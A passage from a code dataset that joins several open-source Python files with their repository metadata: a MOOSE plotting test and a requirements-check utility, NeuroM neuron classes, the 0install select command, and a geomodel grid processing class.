expect21 = expected(0.174, 0.524, 0.0, 4E-6)
m21 = moose("gold/small_deform_hard22.csv")
plt.plot(expect21[0], expect21[1], 'k-', linewidth = 3.0, label = 'expected')
plt.plot(m21[0], m21[1], 'k^', label = 'MOOSE')
plt.legend(loc = 'lower right')
plt.xlabel("internal parameter")
plt.ylabel("Friction angle")
plt.ticklabel_format(style='sci', axis='x', scilimits=(0,0))
plt.title("Friction-angle hardening")
# NOTE(review): requires the 'figures' directory and the gold CSV to exist
# relative to the current working directory.
plt.savefig("figures/small_deform_hard_22.eps")
sys.exit(0)
| nuclear-wizard/moose | modules/tensor_mechanics/test/tests/capped_mohr_coulomb/small_deform_hard_22.py | Python | lgpl-2.1 | 1,644 | [
"MOOSE"
] | 689eee2e7e0a5cf95f154e1d557a39187b0a8ce2eef264bba8f6f933e16dced3 |
#!/usr/bin/env python3
#* This file is part of the MOOSE framework
#* https://www.mooseframework.org
#*
#* All rights reserved, see COPYRIGHT for full restrictions
#* https://github.com/idaholab/moose/blob/master/COPYRIGHT
#*
#* Licensed under LGPL 2.1, please see LICENSE for details
#* https://www.gnu.org/licenses/lgpl-2.1.html
import os
import collections
import subprocess
from .mooseutils import git_root_dir, colorText
def check_requirement(filename):
    """Inspect a test spec file for requirement documentation.

    Prints the problems and returns 1 if any non-deprecated block lacks the
    required 'requirement'/'design'/'issues'/'detail' parameters or misuses
    them inside a group; returns 0 otherwise.
    """
    import pyhit

    root = pyhit.load(filename)
    top = root.children[0]
    # Top-level values act as defaults for the individual test blocks.
    default_design = top.get('design', '')
    default_issues = top.get('issues', '')
    default_deprecated = top.get('deprecated', False)

    messages = []
    for child in top:
        # Deprecated tests are exempt from the documentation requirements.
        if child.get('deprecated', default_deprecated):
            continue
        if 'requirement' not in child:
            messages.append(" 'requirement' parameter is missing or empty in '{}' block.".format(child.name))
        if not child.get('design', default_design).strip():
            messages.append(" 'design' parameter is missing or empty in '{}' block.".format(child.name))
        if not child.get('issues', default_issues).strip():
            messages.append(" 'issues' parameter is missing or empty in '{}' block.".format(child.name))
        for grandchild in child.children:
            # Grouped tests document each step with 'detail' and inherit the
            # requirement/design/issues from the enclosing block.
            if 'detail' not in grandchild:
                messages.append(" 'detail' parameter is missing or empty in '{}' block.".format(grandchild.name))
            if 'requirement' in grandchild:
                messages.append(" 'requirement' parameter in block '{}' must not be used within a group, use 'detail' instead.".format(grandchild.name))
            if 'design' in grandchild:
                messages.append(" 'design' parameter in block '{}' must not be used within a group.".format(grandchild.name))
            if 'issues' in grandchild:
                messages.append(" 'issues' parameter in block '{}' must not be used within a group.".format(grandchild.name))

    if not messages:
        return 0
    print('ERROR in {}'.format(filename))
    print('\n'.join(messages) + '\n')
    return 1
def sqa_check(working_dir=None, remote='origin', branch='devel', specs=('tests',), skip=()):
    """Check that test specs modified relative to `remote/branch` document requirements.

    Args:
        working_dir: repository directory (default: the current directory,
            resolved at call time).
        remote, branch: git remote/branch whose merge-base is diffed against.
        specs: spec file basenames to check.
        skip: substrings; files whose path contains any of them are skipped.

    Returns:
        The number of changed spec files with missing requirement documentation.
    """
    # Bug fix: the defaults were `working_dir=os.getcwd()` plus mutable
    # lists, all evaluated once at import time; resolve the directory per
    # call and use immutable default containers instead.
    if working_dir is None:
        working_dir = os.getcwd()

    # Update remote refs so the merge-base below is current.
    subprocess.call(['git', 'fetch', remote])

    # Root directory of the repository containing working_dir.
    root = git_root_dir(working_dir)

    # Diff against the merge-base so only this branch's changes count.
    sha = subprocess.check_output(
        ['git', 'merge-base', '{}/{}'.format(remote, branch), 'HEAD']).decode().strip()
    changed = subprocess.check_output(['git', 'diff', sha, '--name-only']).decode().split('\n')

    count = 0
    for filename in changed:
        fullname = os.path.join(root, filename)
        if os.path.isfile(fullname) and (os.path.basename(filename) in specs) and \
           not any(s in filename for s in skip):
            count += check_requirement(fullname)
    return count
def sqa_check_requirement_duplicates(working_dir=None, specs=('tests',), skip=()):
    """Check that no duplicate requirement strings exist under `working_dir`.

    Walks the tree for spec files (basenames in `specs`, paths not containing
    any substring in `skip`), collects every 'requirement' parameter, and
    prints the locations of any requirement text appearing more than once.

    Returns:
        The number of duplicated requirement strings found (0 when clean).
    """
    import pyhit

    # Bug fix: the default `working_dir=os.getcwd()` was evaluated once at
    # import time; resolve it per call instead.
    if working_dir is None:
        working_dir = os.getcwd()

    requirements = collections.defaultdict(list)
    for root, _, files in os.walk(working_dir):
        for fname in files:
            filename = os.path.join(root, fname)
            if fname in specs and not any(s in filename for s in skip):
                node = pyhit.load(filename)
                for child in node.children[0]:
                    req = child.get('requirement', None)
                    if req is not None:
                        requirements[req.strip()].append((filename, child.fullpath, child.line('requirement')))

    count = 0
    for key, locations in requirements.items():
        if len(locations) > 1:
            if count == 0:
                print(colorText('Duplicate Requirements Found:\n', 'YELLOW'))
            count += 1
            # Bug fix: requirements of 80 characters or fewer were previously
            # never printed (only their file locations); print every
            # duplicated requirement, truncating the long ones.
            if len(key) > 80:
                print(colorText('{}...'.format(key[:80]), 'YELLOW'))
            else:
                print(colorText(key, 'YELLOW'))
            for filename, _path, line in locations:
                print(' {}:{}'.format(filename, line))
    return count
| nuclear-wizard/moose | python/mooseutils/sqa_check.py | Python | lgpl-2.1 | 4,229 | [
"MOOSE"
] | 837c5326bc91b46cbd72f421e6ea4520ffd052c37344cecb9f30b0f48075bda2 |
# Copyright (c) 2015, Ecole Polytechnique Federale de Lausanne, Blue Brain Project
# All rights reserved.
#
# This file is part of NeuroM <https://github.com/BlueBrain/NeuroM>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of
# its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''Neuron classes and functions'''
from copy import deepcopy
from itertools import chain
import numpy as np
from neurom import morphmath
from neurom._compat import filter, map, zip
from neurom.core._soma import Soma
from neurom.core.dataformat import COLS
from neurom.utils import memoize
from . import NeuriteType, Tree
def iter_neurites(obj, mapfun=None, filt=None):
    '''Iterate over the neurites of a neurite, neuron or neuron population.

    Parameters:
        obj: a neurite, a neuron, a population, or any iterable of neurites.
        mapfun: optional function applied to each yielded neurite.
        filt: optional predicate used to filter the neurites.

    Returns:
        An iterator over the (optionally filtered and mapped) neurites.

    Examples:
        Number of points in each axon of a population:

        >>> import neurom as nm
        >>> from neurom.core import iter_neurites
        >>> n_points = [n for n in iter_neurites(pop, lambda x: len(x.points),
        ...                                      lambda n: n.type == nm.AXON)]
    '''
    # Normalise the input to an iterable of neurites.
    if isinstance(obj, Neurite):
        neurites = (obj,)
    elif hasattr(obj, 'neurites'):
        neurites = obj.neurites
    else:
        neurites = obj

    selected = iter(neurites) if filt is None else filter(filt, neurites)
    return selected if mapfun is None else map(mapfun, selected)
def iter_sections(neurites, iterator_type=Tree.ipreorder, neurite_filter=None):
    '''Iterate over the sections in a neurite, neuron or neuron population.

    Parameters:
        neurites: neuron, population, neurite, or iterable of neurites.
        iterator_type: tree traversal applied to each neurite's root node
            (ipreorder, iupstream, ibifurcation_point, ...).
        neurite_filter: optional top-level filter on the neurite objects.

    Returns:
        A single iterator chaining the sections of all selected neurites.
    '''
    selected = iter_neurites(neurites, filt=neurite_filter)
    return chain.from_iterable(iterator_type(n.root_node) for n in selected)
def iter_segments(obj, neurite_filter=None):
    '''Iterate over the segments in a collection of neurites.

    Parameters:
        obj: neuron, population, neurite, section, or iterable of neurites.
        neurite_filter: optional top-level filter on the neurite objects.

    Note:
        Convenience function for generic access to segments; custom
        section-wise numpy iteration may be faster for heavy analysis.
    '''
    if isinstance(obj, Section):
        sections = iter((obj,))
    else:
        sections = iter(iter_sections(obj, neurite_filter=neurite_filter))
    # A segment is a pair of consecutive points within one section.
    return chain.from_iterable(zip(sec.points[:-1], sec.points[1:])
                               for sec in sections)
def graft_neuron(root_section):
    '''Build a single-neurite neuron whose tree starts at `root_section`.

    The soma is constructed from the section's first point only.
    '''
    assert isinstance(root_section, Section)
    soma = Soma(root_section.points[:1])
    return Neuron(soma=soma, neurites=[Neurite(root_section)])
class Section(Tree):
    '''Class representing a neurite section: a tree node carrying the
    section's sample points, identifier and neurite type.'''

    def __init__(self, points, section_id=None, section_type=NeuriteType.undefined):
        super(Section, self).__init__()
        # Identifier of this section within the morphology.
        self.id = section_id
        # Point array for this section (sliced with COLS elsewhere in neurom).
        self.points = points
        # NeuriteType of the neurite this section belongs to.
        self.type = section_type

    @property
    @memoize  # computed once per instance and cached
    def length(self):
        '''Return the path length of this section.'''
        return morphmath.section_length(self.points)

    @property
    @memoize
    def area(self):
        '''Return the surface area of this section.

        The area is calculated from the segments, as defined by this
        section's points
        '''
        return sum(morphmath.segment_area(s) for s in iter_segments(self))

    @property
    @memoize
    def volume(self):
        '''Return the volume of this section.

        The volume is calculated from the segments, as defined by this
        section's points
        '''
        return sum(morphmath.segment_volume(s) for s in iter_segments(self))

    def __str__(self):
        return 'Section(id=%s, type=%s, n_points=%s) <parent: %s, nchildren: %d>' % \
            (self.id, self.type, len(self.points), self.parent, len(self.children))

    # repr mirrors str for readable debugging output.
    __repr__ = __str__
class Neurite(object):
    '''A neurite tree, wrapping its root section node.'''

    def __init__(self, root_node):
        self.root_node = root_node
        # take the type from the root node when available
        if hasattr(root_node, 'type'):
            self.type = root_node.type
        else:
            self.type = NeuriteType.undefined

    @property
    @memoize
    def points(self):
        '''Return unordered array with all the points in this neurite'''
        # start with the root section's first point (the only one that is not a
        # duplicate), then add every point of every section except each
        # section's first point, which duplicates its parent's last point
        pts = [self.root_node.points[0][COLS.XYZR]]
        for sec in self.root_node.ipreorder():
            pts.extend(sec.points[1:, COLS.XYZR])
        return np.array(pts)

    @property
    @memoize
    def length(self):
        '''Total length of this neurite: the sum of its section lengths.'''
        return sum(sec.length for sec in self.iter_sections())

    @property
    @memoize
    def area(self):
        '''Total surface area of this neurite: the sum of its section areas.'''
        return sum(sec.area for sec in self.iter_sections())

    @property
    @memoize
    def volume(self):
        '''Total volume of this neurite: the sum of its section volumes.'''
        return sum(sec.volume for sec in self.iter_sections())

    def transform(self, trans):
        '''Return a copy of this neurite with a 3D transformation applied'''
        clone = deepcopy(self)
        for sec in clone.iter_sections():
            sec.points[:, 0:3] = trans(sec.points[:, 0:3])
        return clone

    def iter_sections(self, order=Tree.ipreorder):
        '''iteration over section nodes'''
        return iter_sections(self, iterator_type=order)

    def __deepcopy__(self, memo):
        '''Deep copy of neurite object'''
        return Neurite(deepcopy(self.root_node, memo))

    def __nonzero__(self):
        return bool(self.root_node)

    __bool__ = __nonzero__

    def __eq__(self, other):
        return self.type == other.type and self.root_node == other.root_node

    def __hash__(self):
        return hash((self.type, self.root_node))

    def __str__(self):
        return 'Neurite <type: %s>' % self.type

    __repr__ = __str__
class Neuron(object):
    '''A simple neuron: a soma plus collections of neurites and sections.'''

    def __init__(self, soma=None, neurites=None, sections=None, name='Neuron'):
        # plain attribute storage; no copying or validation is performed
        self.soma = soma
        self.neurites = neurites
        self.sections = sections
        self.name = name

    def __str__(self):
        return 'Neuron <soma: %s, n_neurites: %d>' % (self.soma, len(self.neurites))

    __repr__ = __str__
| juanchopanza/NeuroM | neurom/core/_neuron.py | Python | bsd-3-clause | 9,124 | [
"NEURON"
] | cc6a0399aab3b4ceb23d79bb169224317b28c3505148b96d3e7088cf10e166ef |
"""
The B{0install select} command-line interface.
"""
# Copyright (C) 2011, Thomas Leonard
# See the README file for details, or visit http://0install.net.
import os, sys
import logging
from zeroinstall import _
from zeroinstall.cmd import UsageError
from zeroinstall.injector import model, selections, requirements
from zeroinstall.injector.policy import Policy
syntax = "URI"
def add_generic_select_options(parser):
	"""All options for selecting.

	Registers the selection-related command-line options shared by the
	selecting sub-commands on *parser*.
	@param parser: the optparse.OptionParser to extend
	"""
	parser.add_option("", "--before", help=_("choose a version before this"), metavar='VERSION')
	parser.add_option("", "--command", help=_("command to select"), metavar='COMMAND')
	parser.add_option("", "--cpu", help=_("target CPU type"), metavar='CPU')
	parser.add_option("", "--message", help=_("message to display when interacting with user"))
	parser.add_option("", "--not-before", help=_("minimum version to choose"), metavar='VERSION')
	parser.add_option("-o", "--offline", help=_("try to avoid using the network"), action='store_true')
	# fixed typo in user-visible help text: "operation system" -> "operating system"
	parser.add_option("", "--os", help=_("target operating system type"), metavar='OS')
	parser.add_option("-r", "--refresh", help=_("refresh all used interfaces"), action='store_true')
	parser.add_option("-s", "--source", help=_("select source code"), action='store_true')
def add_options(parser):
	"""Options for 'select' and 'download' (but not 'run')

	Adds all generic selection options, plus --xml output.
	@param parser: the optparse.OptionParser to extend
	"""
	add_generic_select_options(parser)
	parser.add_option("", "--xml", help=_("write selected versions as XML"), action='store_true')
def get_selections(config, options, iface_uri, select_only, download_only, test_callback):
	"""Get selections for iface_uri, according to the options passed.
	Will switch to GUI mode if necessary.
	@param config: the zeroinstall configuration
	@param options: options from OptionParser
	@param iface_uri: canonical URI of the interface
	@param select_only: return immediately even if the selected versions aren't cached
	@param download_only: wait for stale feeds, and display GUI button as Download, not Run
	@param test_callback: callback used by the GUI to test a selection (may be None)
	@return: the selected versions, or None if the user cancels
	@rtype: L{selections.Selections} | None
	"""
	if options.offline:
		config.network_use = model.network_offline
	# Try to load it as a feed. If it is a feed, it'll get cached. If not, it's a
	# selections document and we return immediately.
	maybe_selections = config.iface_cache.get_feed(iface_uri, selections_ok = True)
	if isinstance(maybe_selections, selections.Selections):
		if not select_only:
			blocker = maybe_selections.download_missing(config)
			if blocker:
				logging.info(_("Waiting for selected implementations to be downloaded..."))
				config.handler.wait_for_blocker(blocker)
		return maybe_selections
	r = requirements.Requirements(iface_uri)
	r.parse_options(options)
	policy = Policy(config = config, requirements = r)
	# Note that need_download() triggers a solve
	if options.refresh or options.gui:
		# We could run immediately, but the user asked us not to
		can_run_immediately = False
	else:
		if select_only:
			# --select-only: we only care that we've made a selection, not that we've cached the implementations
			policy.need_download()
			can_run_immediately = policy.ready
		else:
			can_run_immediately = not policy.need_download()
		stale_feeds = [feed for feed in policy.solver.feeds_used if
				not feed.startswith('distribution:') and	# Ignore (memory-only) PackageKit feeds
				policy.is_stale(config.iface_cache.get_feed(feed))]
		if download_only and stale_feeds:
			can_run_immediately = False
		if can_run_immediately:
			if stale_feeds:
				if policy.network_use == model.network_offline:
					# fixed typo in log message: "No doing" -> "Not doing"
					logging.debug(_("Not doing background update because we are in off-line mode."))
				else:
					# There are feeds we should update, but we can run without them.
					# Do the update in the background while the program is running.
					from zeroinstall.injector import background
					background.spawn_background_update(policy, options.verbose > 0)
			return policy.solver.selections
	# If the user didn't say whether to use the GUI, choose for them.
	if options.gui is None and os.environ.get('DISPLAY', None):
		options.gui = True
		# If we need to download anything, we might as well
		# refresh all the feeds first.
		options.refresh = True
		logging.info(_("Switching to GUI mode... (use --console to disable)"))
	if options.gui:
		gui_args = policy.requirements.get_as_options()
		if download_only:
			# Just changes the button's label
			gui_args.append('--download-only')
		if options.refresh:
			gui_args.append('--refresh')
		if options.verbose:
			gui_args.insert(0, '--verbose')
			if options.verbose > 1:
				gui_args.insert(0, '--verbose')
		if options.with_store:
			for x in options.with_store:
				gui_args += ['--with-store', x]
		if select_only:
			gui_args.append('--select-only')
		from zeroinstall import helpers
		sels = helpers.get_selections_gui(iface_uri, gui_args, test_callback)
		if not sels:
			return None		# Aborted
	else:
		# Note: --download-only also makes us stop and download stale feeds first.
		downloaded = policy.solve_and_download_impls(refresh = options.refresh or download_only or False,
							select_only = select_only)
		if downloaded:
			config.handler.wait_for_blocker(downloaded)
		sels = selections.Selections(policy)
	return sels
def handle(config, options, args):
	"""Handle the '0install select' sub-command.
	@param config: the zeroinstall configuration
	@param options: parsed command-line options
	@param args: positional arguments; must be exactly one interface URI
	@raise UsageError: if the wrong number of arguments is given
	"""
	if len(args) != 1:
		raise UsageError()
	iface_uri = model.canonical_iface_uri(args[0])
	# select only: we never download implementations for plain 'select'
	sels = get_selections(config, options, iface_uri,
				select_only = True, download_only = False, test_callback = None)
	if not sels:
		sys.exit(1)	# Aborted by user
	if options.xml:
		show_xml(sels)
	else:
		show_human(sels, config.stores)
def show_xml(sels):
	"""Write *sels* to stdout as an XML selections document, newline-terminated."""
	out = sys.stdout
	sels.toDOM().writexml(out)
	out.write('\n')
def show_human(sels, stores):
	"""Print a human-readable tree of the selections to stdout.
	@param sels: the selections to display
	@param stores: the implementation stores, used to locate cached paths
	"""
	from zeroinstall import zerostore
	done = set()	# detect cycles
	def print_node(uri, command, indent):
		# Print one interface and recurse into its dependencies.
		# uri: interface URI; command: index into sels.commands (or None);
		# indent: current indentation prefix string
		if uri in done: return
		done.add(uri)
		impl = sels.selections.get(uri, None)
		print indent + "- URI:", uri
		if impl:
			print indent + "  Version:", impl.version
			try:
				if impl.id.startswith('package:'):
					# distribution package: no cached path of its own
					path = "(" + impl.id + ")"
				else:
					path = impl.local_path or stores.lookup_any(impl.digests)
			except zerostore.NotStored:
				path = "(not cached)"
			print indent + "  Path:", path
			indent += "  "
			deps = impl.dependencies
			if command is not None:
				deps += sels.commands[command].requires
			for child in deps:
				if isinstance(child, model.InterfaceDependency):
					if child.qdom.name == 'runner':
						# a <runner> dependency uses the next command in the list
						child_command = command + 1
					else:
						child_command = None
					print_node(child.interface, child_command, indent)
		else:
			print indent + "  No selected version"
	if sels.commands:
		# start at the first command of the root interface
		print_node(sels.interface, 0, "")
	else:
		print_node(sels.interface, None, "")
| pombredanne/zero-install | zeroinstall/cmd/select.py | Python | lgpl-2.1 | 6,751 | [
"VisIt"
] | 6979fb741acaeef3fb2d4f86c0a1a22571733e7462e107e430bb43bdc4e5f77e |
'''Module with classes and methods to analyse and process exported geomodel grids
Created on 21/03/2014
@author: Florian Wellmann (some parts originally developed by Erik Schaeffer)
'''
import numpy as np
try:
import matplotlib.pyplot as plt
except ImportError:
print("\n\n\tMatplotlib not installed - plotting functions will not work!\n\n\n")
# import mpl_toolkits
# from matplotlib.ticker import MultipleLocator, FormatStrFormatter
# to convert python variable types to cpp types
import ctypes
# to create array
from numpy.ctypeslib import ndpointer
# to create folder
import os
# read out and change xml file (here only used to read out model boundary information)
import geomodeller_xml_obj as GO
class GeoGrid():
    """Object definition for exported geomodel grids"""
    # NOTE: Python-2-only constructs (dict.has_key, print statements) are used
    # throughout this class.
    def __init__(self, **kwds):
        """GeoGrid contains methods to load, analyse, and process exported geomodel grids
        **Optional Keywords**:
            - *grid_filename* = string : filename of exported grid
            - *delxyz_filename* = string : file with model discretisation
            - *dimensions_filename* = string : file with model dimension (coordinates)
        """
        # only filenames are stored here; the actual loading is done in load_grid()
        if kwds.has_key('grid_filename'):
            self.grid_filename = kwds['grid_filename']
        if kwds.has_key('delxyz_filename'):
            self.delxyz_filename = kwds['delxyz_filename']
        if kwds.has_key('dimensions_filename'):
            self.dimensions_filename = kwds['dimensions_filename']
    def __add__(self, G_other):
        """Combine grid with another GeoGrid if regions are overlapping"""
        # check overlap
        # NOTE(review): this only reports the overlap; no combined grid is
        # built or returned (see the module-level combine_grids helper).
        print self.ymin, self.ymax
        print G_other.ymin, G_other.ymax
        if (G_other.ymin < self.ymax and G_other.ymin > self.ymin):
            print("Grids overlapping in y-direction between %.0f and %.0f" %
                  (G_other.ymin, self.ymax))
    def load_grid(self):
        """Load exported grid, discretisation and dimensions from file"""
        if not hasattr(self, 'grid_filename'):
            raise AttributeError("Grid filename is not defined!")
        self.grid = np.loadtxt(self.grid_filename,
                               delimiter = ',',
                               dtype='int',
                               unpack=False)
        if hasattr(self, 'delxyz_filename'):
            self.load_delxyz(self.delxyz_filename)
            self.adjust_gridshape()
        if hasattr(self, 'dimensions_filename'):
            self.load_dimensions(self.dimensions_filename)
    def load_delxyz(self, delxyz_filename):
        """Load grid discretisation from file"""
        # x and y lines use a "count*size" shorthand; the z line is an explicit
        # comma-separated list (with a trailing comma, hence the [:-1])
        del_lines = open(delxyz_filename, 'r').readlines()
        d0 = del_lines[0].split("*")
        self.delx = np.array([float(d0[1]) for _ in range(int(d0[0]))])
        d1 = del_lines[1].split("*")
        self.dely = np.array([float(d1[1]) for _ in range(int(d1[0]))])
        d2 = del_lines[2].split(",")[:-1]
        self.delz = np.array([float(d) for d in d2])
        (self.nx, self.ny, self.nz) = (len(self.delx), len(self.dely), len(self.delz))
        (self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
    def set_delxyz(self, delxyz):
        """Set delx, dely, delz arrays explicitly and update additional attributes
        **Arguments**:
            - *delxyz* = (delx-array, dely-array, delz-array): arrays with cell dimensions
        """
        self.delx, self.dely, self.delz = delxyz
        (self.nx, self.ny, self.nz) = (len(self.delx), len(self.dely), len(self.delz))
        (self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
    def set_basename(self, name):
        """Set basename for grid exports, etc.
        **Arguments**:
            - *name* = string: basename
        """
        self.basename = name
    def load_dimensions(self, dimensions_filename):
        """Load project dimensions from file"""
        dim = [float(d) for d in open(dimensions_filename, 'r').readlines()[1].split(",")]
        (self.xmin, self.xmax, self.ymin, self.ymax, self.zmin, self.zmax) = dim
        # calculate cell centre positions in real world coordinates
    def define_regular_grid(self, nx, ny, nz):
        """Define a regular grid from defined project boundaries and given discretisations"""
        self.nx = nx
        self.ny = ny
        self.nz = nz
        self.delx = np.ones(nx) * (self.xmax - self.xmin) / nx
        self.dely = np.ones(ny) * (self.ymax - self.ymin) / ny
        self.delz = np.ones(nz) * (self.zmax - self.zmin) / nz
        # create (empty) grid object
        self.grid = np.ndarray((nx, ny, nz))
        # update model extent
        (self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
    def define_irregular_grid(self, delx, dely, delz):
        """Set irregular grid according to delimter arrays in each direction"""
        self.delx = delx
        self.dely = dely
        self.delz = delz
        self.nx = len(delx)
        self.ny = len(dely)
        self.nz = len(delz)
        # create (empty) grid object
        self.grid = np.ndarray((self.nx, self.ny, self.nz))
        # update model extent
        (self.extent_x, self.extent_y, self.extent_z) = (sum(self.delx), sum(self.dely), sum(self.delz))
    def get_dimensions_from_geomodeller_xml_project(self, xml_filename):
        """Get grid dimensions from Geomodeller project
        **Arguments**:
            - *xml_filename* = string: filename of Geomodeller XML file
        """
        # Note: this implementation is based on the Geomodeller API
        # The boundaries could theoretically also be extracted from the XML file
        # directly, e.g. using the geomodeller_xml_obj module - but this would
        # require an additional module being loaded, so avoid here!
        filename_ctypes = ctypes.c_char_p(xml_filename)
        # get model boundaries
        lib = ctypes.CDLL('./libgeomod.so') #linux
        #lib = ctypes.windll.libgeomod #windows
        lib.get_model_bounds.restype = ndpointer(dtype=ctypes.c_int, shape=(6,))
        boundaries = lib.get_model_bounds(filename_ctypes)
        (self.xmin, self.xmax, self.ymin, self.ymax, self.zmin, self.zmax) = boundaries
        self.extent_x = self.xmax - self.xmin
        self.extent_y = self.ymax - self.ymin
        self.extent_z = self.zmax - self.zmin
    def update_from_geomodeller_project(self, xml_filename):
        """Update grid properties directly from Geomodeller project
        **Arguments**:
            - *xml_filename* = string: filename of Geomodeller XML file
        """
        filename_ctypes = ctypes.c_char_p(xml_filename)
        # create cell position list with [x0, y0, z0, ... xn, yn, zn]
        cell_position = []
        ids = []
        # check if cell centers are defined - if not, do so!
        if not hasattr(self, 'cell_centers_x'):
            self.determine_cell_centers()
        # flatten cell centres in z-dominant order; ids keeps the (i,j,k)
        # index of each flattened entry for the re-sort below
        for k in range(self.nz):
            for j in range(self.ny):
                for i in range(self.nx):
                    cell_position.append(self.cell_centers_x[i])
                    cell_position.append(self.cell_centers_y[j])
                    cell_position.append(self.cell_centers_z[k])
                    ids.append((i,j,k))
        # prepare variables for cpp function
        coord_ctypes = (ctypes.c_double * len(cell_position))(*cell_position)
        coord_len = len(cell_position)
        # call cpp function
        lib = ctypes.CDLL('./libgeomod.so')
        lib.compute_irregular_grid.restype = ndpointer(dtype=ctypes.c_int, shape=(coord_len/3,))
        formations_raw = lib.compute_irregular_grid(filename_ctypes, coord_ctypes, coord_len)
        # re-sort formations into array
        for i in range(len(formations_raw)):
            self.grid[ids[i][0],ids[i][1],ids[i][2]] = formations_raw[i]
    def set_densities(self, densities):
        """Set layer densities
        **Arguments**:
            - *densities* = dictionary of floats: densities for geology ids
        """
        self.densities = densities
    def set_sus(self, sus):
        """Set layer susceptibilities
        **Arguments**:
            - *sus* = dictionary of floats: magnetic susceptibilities for geology ids
        """
        self.sus = sus
    def write_noddy_files(self, **kwds):
        """Create Noddy block model files (for grav/mag calculation)
        **Optional keywords**:
            - *gps_range* = float : set GPS range (default: 1200.)
        Method generates the files required to run the forward gravity/ magnetics response
        from the block model:
        - model.g00 = file with basic model information
        - model.g12 = discretised geological (block) model
        - base.his = Noddy history file with some basic settings
        """
        self.gps_range = kwds.get("gps_range", 1200.)
        if not hasattr(self, 'basename'):
            self.basename = "geogrid"
        f_g12 = open(self.basename + ".g12", 'w')
        f_g01 = open(self.basename + ".g00", 'w')
        # method = 'numpy' # using numpy should be faster - but it messes up the order... possible to fix?
        # if method == 'standard':
        #     i = 0
        #     j = 0
        #     k = 0
        #     self.block = np.ndarray((self.nx,self.ny,self.nz))
        #     for line in f.readlines():
        #         if line == '\n':
        #             # next z-slice
        #             k += 1
        #             # reset x counter
        #             i = 0
        #             continue
        #         l = [int(l1) for l1 in line.strip().split("\t")]
        #         self.block[i,:,self.nz-k-1] = np.array(l)[::-1]
        #         i += 1
        if not hasattr(self, "unit_ids"):
            self.determine_geology_ids()
        #=======================================================================
        # # create file with base settings (.g00)
        #=======================================================================
        f_g01.write("VERSION = 7.11\n")
        f_g01.write("FILE PREFIX = " + self.basename + "\n")
        import time
        t = time.localtime() # get current time
        f_g01.write("DATE = %d/%d/%d\n" % (t.tm_mday, t.tm_mon, t.tm_year))
        f_g01.write("TIME = %d:%d:%d\n" % (t.tm_hour, t.tm_min, t.tm_sec))
        # model box is extended by gps_range in x and y for the forward calculation
        f_g01.write("UPPER SW CORNER (X Y Z) = %.1f %.1f %.1f\n" % (self.xmin - self.gps_range,
                                                                    self.ymin - self.gps_range,
                                                                    self.zmax))
        f_g01.write("LOWER NE CORNER (X Y Z) = %.1f %.1f %.1f\n" % (self.xmax + self.gps_range,
                                                                    self.ymax + self.gps_range,
                                                                    self.zmin))
        f_g01.write("NUMBER OF LAYERS = %d\n" % self.nz)
        for k in range(self.nz):
            # NOTE(review): assumes a laterally regular grid - only delx[0] and
            # dely[0] are used as the cube size. TODO confirm.
            f_g01.write("\tLAYER %d DIMENSIONS (X Y) = %d %d\n" % (k,
                                                                   self.nx + 2 * (self.gps_range / self.delx[0]),
                                                                   self.ny + 2 * (self.gps_range / self.dely[0])))
        f_g01.write("NUMBER OF CUBE SIZES = %d\n" % self.nz)
        for k in range(self.nz):
            f_g01.write("\tCUBE SIZE FOR LAYER %d = %d\n" % (k, self.delx[0]))
        f_g01.write("CALCULATION RANGE = %d\n" % (self.gps_range / self.delx[0]))
        f_g01.write("""INCLINATION OF EARTH MAG FIELD = -67.00
INTENSITY OF EARTH MAG FIELD = 63000.00
DECLINATION OF VOL. WRT. MAG NORTH = 0.00
DENSITY CALCULATED = Yes
SUSCEPTIBILITY CALCULATED = Yes
REMANENCE CALCULATED = No
ANISOTROPY CALCULATED = No
INDEXED DATA FORMAT = Yes
""")
        f_g01.write("NUM ROCK TYPES = %d\n" % len(self.unit_ids))
        for i in self.unit_ids:
            f_g01.write("ROCK DEFINITION Layer %d = %d\n" % (i, i))
            f_g01.write("\tDensity = %f\n" % self.densities[int(i)])
            f_g01.write("\tSus = %f\n" % self.sus[int(i)])
        #=======================================================================
        # Create g12 file
        #=======================================================================
        # write geology blocks to file
        for k in range(self.nz):
            # this worked for geophysics, but not for re-import with pynoddy:
            # for val in self.grid[:,:,k].ravel(order = 'A'):
            #     f_g12.write("%d\t" % val)
            for i in range(self.nx):
                for val in self.grid[i,:,k]:
                    f_g12.write("%d\t" % val)
                f_g12.write("\n")
            # f_g12.write(['%d\t' % i for i in self.grid[:,:,k].ravel()])
            f_g12.write("\n")
        f_g12.close()
        f_g01.close()
        #=======================================================================
        # # create noddy history file for base settings
        #=======================================================================
        import pynoddy.history
        history = self.basename + "_base.his"
        nm = pynoddy.history.NoddyHistory()
        # add stratigraphy
        # create dummy names and layers for base stratigraphy
        layer_names = []
        layer_thicknesses = []
        for i in self.unit_ids:
            layer_names.append('Layer %d' % i)
